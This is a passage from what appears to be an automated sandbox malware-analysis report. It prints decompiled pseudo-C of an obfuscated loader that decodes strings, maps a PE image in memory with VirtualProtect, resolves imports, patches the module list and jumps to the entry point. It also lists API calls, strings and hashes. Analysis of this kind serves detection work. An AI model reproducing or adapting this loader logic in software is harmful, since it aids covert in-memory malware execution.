				char _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				char _v104;
				intOrPtr* _v108;
				void* _t146;
				void* _t149;
				void* _t152;
				void* _t162;
				intOrPtr _t171;
				intOrPtr _t173;
				signed int* _t191;
				signed int _t220;
				char _t223;
				void* _t291;

				_v8 = 0xc6f8e435;
				_v12 = 0xc6f8e434;
				_v20 = 7;
				_v19 = 0xa;
				_v18 = 5;
				_v17 = 0x3b;
				_v16 = 0x3c;
				_v15 = 0xee;
				_v28 = 0x79;
				_v27 = 0x7b;
				_t223 = 9;
				_v26 = _t223;
				_v25 = 0x7c;
				_v24 = 0x3b;
				_v23 = 0x3c;
				_v22 = 0xee;
				_v36 = 0x7b;
				_v35 = 6;
				_v34 = 2;
				_v33 = 0x77;
				_v32 = 0xd;
				_v31 = 0x7e;
				_v30 = 5;
				_v29 = 0xee;
				_t146 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				while(_t146 < 6) {
					 *(_t291 + _t146 - 0x10) = ( *(_t291 + _t146 - 0x10) & 0x000000ff ^ 0x0000003f) + 0x2f;
					_t146 = _t146 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
				}
				_t149 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				while(_t149 < 7) {
					 *(_t291 + _t149 - 0x18) = ( *(_t291 + _t149 - 0x18) & 0x000000ff ^ 0x0000003f) + 0x2f;
					_t149 = _t149 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
				}
				_t152 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				while(_t152 < 8) {
					 *(_t291 + _t152 - 0x20) = ( *(_t291 + _t152 - 0x20) & 0x000000ff ^ 0x0000003f) + 0x2f;
					_t152 = _t152 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
				}
				_v108 =  &_v104;
				 *_v108 = 0x4872035f;
				if( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x18c)))) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
					 *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x17c)))) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					 *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x180)))) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					_v60 = 0xe1c4;
					_v58 = 0xe1d1;
					_v56 = 0xe1dd;
					_v54 = 0xe1c0;
					_v52 = 0xe1d6;
					_v50 = 0xe1d9;
					_v48 = 0xe1de;
					_v46 = 0xe049;
					asm("stosw");
					_t191 =  &_v60;
					do {
						 *_t191 = (0x000020b6 ^  *_t191) + 0x3f01;
						_t191 =  &(_t191[0]);
						_t223 = _t223 - 1;
					} while (_t223 != 0);
					_push( &_v60);
					_push(1);
					_push((_v12 ^ 0x2a823c2b) + 0x138527e2);
					_push(_a24 + 0x88);
					_push( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x198)))));
					if( *_a4() == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
						_t220 =  *0xa4d725e | 0x3b73725f;
						 *0xa4d725e = _t220;
						 *0xa4d725e = _t220 + 0xa5310bf;
					}
					_v100 = 0xe1e1;
					_v98 = 0xe1e1;
					_v96 = 0xe1d2;
					_v94 = 0xe1da;
					_v92 = 0xe1d8;
					_v90 = 0xe1c7;
					_v88 = 0xe1ce;
					_v86 = 0xe1e1;
					_v84 = 0xe049;
					_v80 = 0xe1c1;
					_v78 = 0xe1fa;
					_v76 = 0xe1f2;
					_v74 = 0xe1fa;
					_v72 = 0xe1f8;
					_v70 = 0xe1e7;
					_v68 = 0xe1ee;
					_v66 = 0xe1c1;
					_v64 = 0xe049;
					 *(_t291 + 0x270a4f78 + (_v8 ^ 0x2a823c2b) * 2) = (_v8 ^ 0x2a823c2b) + 0x138527e2 ^  *(_t291 + 0x270a4f78 + (_v8 ^ 0x2a823c2b) * 2) & 0x0000ffff;
					 *(_t291 + 0x270a4f64 + (_v8 ^ 0x2a823c2b) * 2) = (_v8 ^ 0x2a823c2b) + 0x138527e2 ^  *(_t291 + 0x270a4f64 + (_v8 ^ 0x2a823c2b) * 2) & 0x0000ffff;
					 *((short*)(_t291 + 0x270a4f48 + (_v8 ^ 0x2a823c2b) * 2)) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					 *((short*)(_t291 + 0x270a4f34 + (_v8 ^ 0x2a823c2b) * 2)) = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				}
				_t120 =  &_a16; // 0x3b
				_v40 = E02458F6C(_v12, _v8, _a4, _a8, _a12,  *_t120, _a20, _a24);
				_t162 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				if(_t162 != _v40) {
					_a24 = _v40 + _a24;
					E02457E13(_a24); // executed
					_t171 = _a24;
					if((_v8 ^ 0x2a823c2b) + 0x138527e2 != ( *( *(_a24 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2) {
						_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x17c))));
						_v0 = _v0 + _t173;
						return _t173;
					}
					return  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x1d4)) + 0x28))( *((intOrPtr*)( *((intOrPtr*)(_a24 + 0x1cc)))));
				}
				return _t162;
			}

0x024590bc
0x024590c3
0x024590d0
0x024590d4
0x024590d8
0x024590dc
0x024590e0
0x024590e4
0x024590e8
0x024590ed
0x024590f5
0x024590f6
0x024590f9
0x024590fd
0x02459101
0x02459105
0x02459109
0x0245910d
0x02459111
0x02459115
0x02459119
0x0245911d
0x02459121
0x02459125
0x02459138
0x02459157
0x02459149
0x02459150
0x02459150
0x02459161
0x02459180
0x02459172
0x02459179
0x02459179
0x0245918a
0x024591a9
0x0245919b
0x024591a2
0x024591a2
0x024591b1
0x024591b7
0x024591d2
0x024591e8
0x024591fa
0x02459201
0x02459208
0x02459211
0x02459218
0x02459221
0x02459228
0x02459231
0x0245923a
0x02459243
0x02459245
0x02459248
0x02459258
0x0245925b
0x0245925e
0x0245925e
0x02459264
0x0245926c
0x0245926e
0x02459277
0x02459281
0x02459294
0x0245929b
0x024592a0
0x024592aa
0x024592aa
0x024592b6
0x024592bf
0x024592c6
0x024592cd
0x024592d4
0x024592db
0x024592e2
0x024592e6
0x024592f1
0x024592fc
0x02459302
0x02459309
0x0245930d
0x02459314
0x0245931b
0x02459322
0x02459326
0x0245932a
0x02459346
0x02459361
0x02459370
0x02459384
0x02459384
0x02459392
0x024593a9
0x024593b4
0x024593b8
0x024593c3
0x024593c9
0x024593e6
0x024593e9
0x02459407
0x02459409
0x00000000
0x02459409
0x00000000
0x024593fc
0x0245940f

Strings

w, xrefs: 02459115
{, xrefs: 02459109
<, xrefs: 02459101
<, xrefs: 024590E0
y, xrefs: 024590E8
;, xrefs: 024590DC
;, xrefs: 024590FD
|, xrefs: 024590F9
~, xrefs: 0245911D
;<, xrefs: 02459392
{, xrefs: 024590ED

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ;$;$;<$<$<$w$y${${$|$~
API String ID: 0-3985088450
Opcode ID: 878cdaf6ec9676d7fdd5c4180dbd33a61277ee012233e65cbb43da13221c47ce
Instruction ID: 57c83e2feec7b4cf614c240a423b19929aeaf1cd43b2e3607b87c03684741bdf
Opcode Fuzzy Hash: 878cdaf6ec9676d7fdd5c4180dbd33a61277ee012233e65cbb43da13221c47ce
Instruction Fuzzy Hash: FAC18F35A04299DFCB01CFA8C880ADEBBF2FF59304F1541A9E845EB351E3749A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004145CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004145CF(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x004145cf
0x004145cf
0x004145e1
0x00000000
0x004145f4
0x004145f5
0x00414600
0x00414608
0x00414643
0x00414643
0x00414647
0x00414649
0x0041464b
0x00414651
0x00414654
0x00414654
0x00000000
0x00414657
0x00414619
0x00414624
0x0041463d
0x00000000
0x00000000
0x00000000
0x00000000
0x00414624

APIs

InitializeSecurityDescriptor.ADVAPI32(0041E5D4,00000001,00000000,0040675B,?,?,00000000), ref: 004145D9
SetSecurityDescriptorDacl.ADVAPI32(0041E5D4,00000001,00000000,00000000,?,?,00000000), ref: 004145EA
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00414600
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0041461C
SetSecurityDescriptorSacl.ADVAPI32(0041E5D4,?,?,?,?,?,00000000), ref: 00414630
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0041463D

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 004145FB

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: b9f79daed3d91f1ad3a37bcf5a237df9df8b5f24ed669165a711afda18e23400
Instruction ID: d924ea726a96619232ec9c363ed6bbfca91e7a831330dbab6d813b4f3391ee15
Opcode Fuzzy Hash: b9f79daed3d91f1ad3a37bcf5a237df9df8b5f24ed669165a711afda18e23400
Instruction Fuzzy Hash: 80112E71A00249BFEF219FE0CD84AEFBBBCAB41744F10416AF651F11A0D7799A809B18

Uniqueness

Uniqueness Score: -1.00%

Function 02459A29, Relevance: 4.9, APIs: 3, Instructions: 391
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02459A29(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20, intOrPtr* _a24, signed int _a28) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v196;
				char _v220;
				intOrPtr _t262;
				intOrPtr _t275;
				void* _t276;
				intOrPtr _t290;
				signed int _t301;
				void* _t303;
				intOrPtr* _t312;
				intOrPtr _t319;
				signed int _t320;
				signed int* _t322;
				signed int _t336;
				intOrPtr _t345;
				void* _t352;
				intOrPtr _t360;
				signed int _t385;
				intOrPtr _t391;
				signed int _t397;
				void* _t401;
				signed int* _t421;
				void* _t439;

				_v8 = 0xc6f8e435;
				_v40 = 0xc6f8e434;
				_v28 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_t336 = _a28;
				_v32 = _v32 ^ _v32;
				_v32 = _v32 + 0xc6f8d435;
				_v16 = _v16 ^ _v16;
				_v16 = _v16 + 0xc6f8e475;
				_v20 = _v20 ^ _v20;
				_v20 = _v20 + 0xc6f8e409;
				_v36 = _v36 ^ _v36;
				_v36 = _v36 + 0xc6f96435;
				_a28 = 0xc6f90e40;
				if(_a4 == 0 || _a8 == 0 || _a20 == 0 ||  *_a4 != (_a28 ^ 0x00003c2b) + 0x27e2) {
					L44:
					return 0;
				} else {
					_v52 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					_t262 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
					_a8 = _t262;
					if( *((intOrPtr*)(_t262 + 0x50)) == 0) {
						goto L44;
					}
					_v48 = 0xc608e435;
					_v48 = (_v48 ^ 0x2a823c2b) + 0x138527e2;
					_t345 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x190)))) + 0x3c)) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x190))));
					_t397 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))));
					_v12 = _t345;
					_a28 = _t397;
					if(_t397 == _t397) {
						VirtualProtect(_a28,  *(_t345 + 0x50), (_v16 ^ 0x2a823c2b) + 0x138527e2,  &_v28);
						E0245A4DE( *((intOrPtr*)(_v12 + 0x50)) -  *(_v12 + 0x54),  *(_v12 + 0x54) + _a28);
						_t397 = _a28;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x194)))) = _t397;
					E0245A3D4(_t397, _a4,  *((intOrPtr*)(_a8 + 0x54)));
					_t275 =  *((intOrPtr*)(_a28 + 0x3c)) + _a28;
					_a20 = ( *(_t275 + 0x14) & 0x0000ffff) + _t275 + 0x18;
					_a8 = _t275;
					if(( *(_t275 + 6) & 0x0000ffff) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
						L16:
						_t352 = _a28;
						if(_t352 !=  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
							L19:
							if(( *( *(_t336 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2 == 0) {
								L31:
								_t276 = E024595E0(_a28, _t275, _t336); // executed
								if(_t276 != 0 && E02459539(_t336, _a28, _a8) != 0 && E02459412(_a8, _t336, _a28) != 0 && E024598C3(_a28, _t336) != 0) {
									_t401 = _a28;
									if(_t401 ==  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
										VirtualProtect(_t401,  *(_v12 + 0x54), _v28,  &_v28);
										_t401 = _a28;
									}
									if(( *( *(_t336 + 0x1c8)) ^ 0x2a823c2b) + 0x138527e2 == 0) {
										_t290 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x28)) + _t401))(0); // executed
									} else {
										_t360 = _a8;
										_a4 = 0xc6f8c435;
										 *(_t360 + 0x16) =  *(_t360 + 0x16) | (_a4 ^ 0x00003c2b) + 0x000027e2;
										_t290 =  *((intOrPtr*)( *((intOrPtr*)(_t360 + 0x28)) + _t401))(_t401, _a12, _a16);
										 *((intOrPtr*)(_t336 + 0x1d0)) = 0xc6f8e434;
									}
									_v12 = _t290;
									 *_a24 = _v12;
									_v52 = 1;
								}
								L41:
								if(_v52 == 0) {
									_a28 = _a28 & 0x00000000;
								}
								return _a28;
							}
							_a4 = _a4 & 0x00000000;
							_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
							_v92 = 0xc6f8e4a7;
							_v88 = 0xc6f8e4b9;
							_v84 = 0xc6f8e4a9;
							_v80 = 0xffffffffc6f8e4a1;
							_v76 = 0xffffffffc6f8e4a1;
							_v72 = 0xc6f8e435;
							do {
								_a4 = _a4 + 1;
								 *((short*)(_t439 + _a4 * 2 - 0xc0)) = (0x00003c2b ^  *(_t439 + _a4 * 4 - 0x58)) + 0x27e2;
							} while (_a4 < 6);
							_v180 = 0xc6f8e4a9;
							_v160 = 0xc6f8e4a9;
							_v120 = 0xc6f8e4a9;
							_v116 = 0xc6f8e4a9;
							_v104 = 0xffffffffc6f8e4ba;
							_v100 = 0xffffffffc6f8e4ba;
							_v184 = 0xc6f8e441;
							_v176 = 0xc6f8e4bb;
							_v172 = 0xffffffffc6f8e44f;
							_v168 = 0xc6f8e4ac;
							_v164 = 0xc6f8e4a7;
							_v156 = 0xc6f8e448;
							_v152 = 0xc6f8e4a7;
							_v148 = 0xc6f8e4b9;
							_v144 = 0xc6f8e4bb;
							_v140 = 0xc6f8e4bc;
							_v136 = 0xffffffffc6f8e44f;
							_v132 = 0xc6f8e4a6;
							_v128 = 0xc6f8e4bb;
							_v124 = 0xc6f8e474;
							_v112 = 0xc6f8e4bb;
							_v108 = 0xc6f8e4a8;
							_v96 = 0xc6f8e435;
							_t301 = 0;
							do {
								 *((char*)(_t439 + _t301 - 0xd8)) = ( *(_t439 + _t301 * 4 - 0xb4) ^ 0x0000002b) - 0x1e;
								_t301 = _t301 + 1;
							} while (_t301 < 0x17);
							_t303 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x1d4)) + 4))( &_v196);
							_v68 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x1d4)) + 8))(_t303,  &_v220);
							 *_v68( *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c)))),  &_v24);
							_v56 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
							_t312 = _v24;
							if(_t312 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
								L30:
								_t275 = _a8;
								goto L31;
							}
							_v64 = _t312;
							while( *((intOrPtr*)(_t312 + 0x18)) !=  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
								_v24 =  *_t312;
								_t312 = _v24;
								if(_t312 == _v64) {
									break;
								}
							}
							if( *((intOrPtr*)(_t312 + 0x18)) ==  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x18c))))) {
								 *((intOrPtr*)(_t312 + 0x1c)) =  *((intOrPtr*)(_a8 + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x194))));
								_v56 = (_v40 ^ 0x2a823c2b) + 0x138527e2;
							}
							goto L30;
						}
						if(VirtualProtect(_t352,  *(_v12 + 0x54), (_v20 ^ 0x2a823c2b) + 0x138527e2,  &_v28) == 0) {
							goto L41;
						}
						_t275 = _a8;
						goto L19;
					}
					_v44 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
					if(_v44 > ( *(_t275 + 6) & 0x0000ffff) - (_v40 ^ 0x2a823c2b) - 0x138527e2) {
						goto L16;
					}
					_t421 =  &(_a20[2]);
					_a20 = _t421;
					while(1) {
						_t319 =  *((intOrPtr*)(_t275 + 0x38));
						_t385 = _t319 - 1;
						_v60 = _t319;
						_t320 =  *_t421;
						if((_t320 & _t385) != 0) {
							_t320 = (_t320 &  !_t385) + _v60;
						}
						E0245A4DE(_t320, _t421[1] + _a28);
						_t322 = _a20;
						_t388 =  *((intOrPtr*)(_t322 + 8));
						if( *((intOrPtr*)(_t322 + 8)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							E0245A3D4( *((intOrPtr*)(_t322 + 4)) + _a28, _a4 +  *((intOrPtr*)(_t322 + 0xc)), _t388);
							_t322 = _a20;
						}
						_t391 = _v44 + (_v40 ^ 0x2a823c2b) + 0x138527e2;
						_a20 = _t322 + 0x28;
						_t275 = _a8;
						_v44 = _t391;
						if(_t391 > ( *(_a8 + 6) & 0x0000ffff) - (_v40 ^ 0x2a823c2b) - 0x138527e2) {
							goto L16;
						}
						_t421 = _a20;
					}
					goto L16;
				}
			}

0x02459a32
0x02459a39
0x02459a54
0x02459a5e
0x02459a61
0x02459a6c
0x02459a6f
0x02459a7e
0x02459a81
0x02459a90
0x02459a93
0x02459aa2
0x02459aa5
0x02459aac
0x02459ab8
0x02459f41
0x00000000
0x02459aed
0x02459af4
0x02459b00
0x02459b03
0x02459b0b
0x00000000
0x00000000
0x02459b11
0x02459b1f
0x02459b30
0x02459b3b
0x02459b3d
0x02459b40
0x02459b45
0x02459b5f
0x02459b71
0x02459b76
0x02459b76
0x02459b7f
0x02459b8b
0x02459b96
0x02459ba0
0x02459bae
0x02459bb3
0x02459c60
0x02459c66
0x02459c6b
0x02459c94
0x02459ca0
0x02459e5b
0x02459e60
0x02459e67
0x02459eae
0x02459eb3
0x02459ec9
0x02459ecc
0x02459ecc
0x02459edb
0x02459f1e
0x02459edd
0x02459edd
0x02459ee3
0x02459eff
0x02459f06
0x02459f08
0x02459f08
0x02459f20
0x02459f29
0x02459f2b
0x02459f2b
0x02459f32
0x02459f36
0x02459f38
0x02459f38
0x00000000
0x02459f3c
0x02459cad
0x02459cb1
0x02459cbc
0x02459cc3
0x02459cca
0x02459ccd
0x02459cd0
0x02459cd3
0x02459cda
0x02459cf2
0x02459cf9
0x02459cf9
0x02459d08
0x02459d0e
0x02459d14
0x02459d17
0x02459d20
0x02459d23
0x02459d26
0x02459d30
0x02459d36
0x02459d3c
0x02459d46
0x02459d50
0x02459d5a
0x02459d64
0x02459d6e
0x02459d74
0x02459d7e
0x02459d84
0x02459d8b
0x02459d8e
0x02459d95
0x02459d98
0x02459d9f
0x02459da6
0x02459da8
0x02459db5
0x02459dbc
0x02459dbd
0x02459dcf
0x02459de3
0x02459df5
0x02459dfe
0x02459e04
0x02459e0d
0x02459e58
0x02459e58
0x00000000
0x02459e58
0x02459e0f
0x02459e23
0x02459e19
0x02459e1c
0x02459e21
0x00000000
0x00000000
0x02459e21
0x02459e3b
0x02459e4b
0x02459e55
0x02459e55
0x00000000
0x02459e3b
0x02459c8b
0x00000000
0x00000000
0x02459c91
0x00000000
0x02459c91
0x02459bc0
0x02459bd3
0x00000000
0x00000000
0x02459bdc
0x02459bdf
0x02459be7
0x02459be7
0x02459bea
0x02459bed
0x02459bf0
0x02459bf4
0x02459bfa
0x02459bfa
0x02459c04
0x02459c0c
0x02459c0f
0x02459c18
0x02459c29
0x02459c2e
0x02459c2e
0x02459c3c
0x02459c46
0x02459c54
0x02459c59
0x02459c5e
0x00000000
0x00000000
0x02459be4
0x02459be4
0x00000000
0x02459be7

APIs

VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E475,?,C6F8E435,138527E2,2A823C2B), ref: 02459B5F
VirtualProtect.KERNELBASE(C6F90E40,?,C6F8E409,?,?,?,?,C6F8E435,138527E2,2A823C2B), ref: 02459C86
VirtualProtect.KERNELBASE(C6F90E40,?,?,?,C6F90E40,?,C6F90E40,C6F8E475,C6F90E40,?,?,?,?,?,C6F8E435,138527E2), ref: 02459EC9

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 856d7f5dceadb80ed5ca52fbc45f4fc03b666cf5614beb3cf62ad064fe88862f
Instruction ID: 2998fcecede87065b041633550331ad619fa5a9a65b6919fd580a0112b92a09a
Opcode Fuzzy Hash: 856d7f5dceadb80ed5ca52fbc45f4fc03b666cf5614beb3cf62ad064fe88862f
Instruction Fuzzy Hash: 7E02D775A10219DFCB04CFA9C990AEEBBB5FF88314F14819AE849AB355D734D942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 024595E0, Relevance: 3.2, APIs: 2, Instructions: 250
libraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E024595E0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				signed int _v20;
				unsigned int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr* _t144;
				struct HINSTANCE__* _t149;
				intOrPtr _t168;
				_Unknown_base(*)()* _t177;
				signed int _t181;
				signed int _t226;
				signed int _t229;
				CHAR* _t241;
				intOrPtr _t242;
				intOrPtr _t243;
				intOrPtr _t252;
				signed int _t280;

				_t280 = 0xc6f8e435;
				_v8 = 0xc6f8e435;
				_v12 = 0xc6f8e434;
				_v20 = 0xda3312bf;
				_t137 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
				_v28 = _t137;
				if((_v8 ^ 0x2a823c2b) + 0x138527e2 ==  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x190))))) {
					L33:
					_t138 = _v8;
				} else {
					_t241 = _a8;
					if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _t241) {
						goto L33;
					} else {
						_t242 =  *((intOrPtr*)(_t241 + 0x80));
						if(_t242 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							L32:
							_t138 = _v12;
						} else {
							_t243 = _t242 + _a4;
							_v48 = _t243;
							while(1) {
								_v20 = (_t280 ^ 0x2a823c2b) + 0x138527e2;
								if(_v20 == _t280 ||  *((intOrPtr*)(_v20 * 0x14 + _t243)) == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									goto L6;
								}
								L7:
								_t144 = _v20 * 0x14 + _t243;
								_v32 =  *((intOrPtr*)(_t144 + 0x10)) + _a4;
								_v40 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
								_t252 =  *_t144;
								_t226 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
								if(_t252 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									_v40 = _t252 + _a4;
								}
								_a8 = (_v8 ^ 0x2a823c2b) +  *((intOrPtr*)(_t144 + 0xc)) + _a4 + 0x138527e2;
								_v44 = 0xc6f8e408;
								do {
									_t149 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4))))(_a8);
									_v16 = _t149;
									if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _t149) {
										_v16 = LoadLibraryA(_a8);
									}
									_v36 = 0x4e6662bc;
									_v36 = 0xc6f8e02c;
									if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v16) {
										_t226 = _t226 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
										 *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4)) + 0x24))(((_v36 ^ 0x2a823c2b) + 0x138527e2) * _t226);
									}
								} while ((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v16 && _t226 <= (_v44 ^ 0x2a823c2b) + 0x138527e2);
								if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _v16) {
									_v24 = 0xd87262bd;
									_a8 = 0xdc804cbf;
									_t229 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
									while( *(_v32 + _t229 * 4) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
										_v24 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
										_a8 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
										_t168 = _v40;
										if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _t168) {
											_v24 =  *((intOrPtr*)(_t168 + _t229 * 4));
										}
										_a8 =  *(_v32 + _t229 * 4);
										if((_v8 ^ 0x2a823c2b) + 0x138527e2 == _v24 || (_v8 ^ 0x2a823c2b) + 0x138527e2 == _v24 >> 0x1f) {
											_t177 = GetProcAddress(_v16,  &(( &(_a8[_a4]))[2]));
										} else {
											_t177 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0x1d4)) + 8))(_v16, _v24 & 0x0000ffff);
										}
										_a8 = _t177;
										_t181 = _v12;
										if((_v8 ^ 0x2a823c2b) + 0x138527e2 != _a8) {
											 *(_v32 + _t229 * 4) = ((_t181 ^ 0x2a823c2b) + 0x138527e2) * _a8;
										} else {
											_v28 = _v28 + (_t181 ^ 0x2a823c2b) + 0x138527e2;
										}
										_t229 = _t229 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
									}
								} else {
									_v28 = _v28 + (_v12 ^ 0x2a823c2b) + 0x138527e2;
								}
								_t137 = _v28;
								_t243 = _v48;
								_t280 = _v20 - 0x138527e1 ^ 0x2a823c2b;
								continue;
								L6:
								if( *((intOrPtr*)(_v20 * 0x14 + _t243 + 0x10)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									goto L7;
								}
								_t138 = _v8;
								if(_t137 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									goto L32;
								}
								goto L34;
							}
						}
					}
				}
				L34:
				return (_t138 ^ 0x2a823c2b) + 0x138527e2;
			}

0x024595e6
0x024595eb
0x024595ee
0x02459611
0x0245962b
0x0245962f
0x02459634
0x024598b5
0x024598b5
0x0245963a
0x0245963d
0x02459646
0x00000000
0x0245964c
0x0245964f
0x0245965b
0x024598b0
0x024598b0
0x02459661
0x02459661
0x02459664
0x02459667
0x0245966d
0x02459675
0x00000000
0x00000000
0x024596a0
0x024596ac
0x024596b6
0x024596c5
